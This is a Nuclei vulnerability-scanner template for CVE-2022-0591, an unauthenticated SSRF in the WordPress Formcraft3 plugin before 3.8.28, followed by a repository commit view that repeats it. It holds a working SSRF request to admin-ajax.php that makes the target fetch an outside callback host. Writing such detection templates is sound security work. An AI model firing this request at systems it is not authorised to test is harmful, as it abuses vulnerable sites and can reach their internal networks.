nuclei-templates/cves/2022/CVE-2022-0591.yaml

id: CVE-2022-0591

info:
  name: Formcraft3 < 3.8.28 - Unauthenticated SSRF
  author: Akincibor
  severity: high
  description: The plugin does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users.
  reference:
    - https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0591
  tags: ssrf,wp,wp-plugin,wordpress,cve,cve2022,unauth,formcraft3

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}'

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
Create CVE-2022-0591.yaml 2022-04-29 19:53:32 +00:00			`id: CVE-2022-0591`

			`info:`
			`name: Formcraft3 < 3.8.28 - Unauthenticated SSRF`
			`author: Akincibor`
			`severity: high`
			`description: The plugin does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users.`
			`reference:`
			`- https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-0591`
			`tags: ssrf,wp,wp-plugin,wordpress,cve,cve2022,unauth,formcraft3`

			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}'`

			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the HTTP Interaction`
			`words:`
			`- "http"`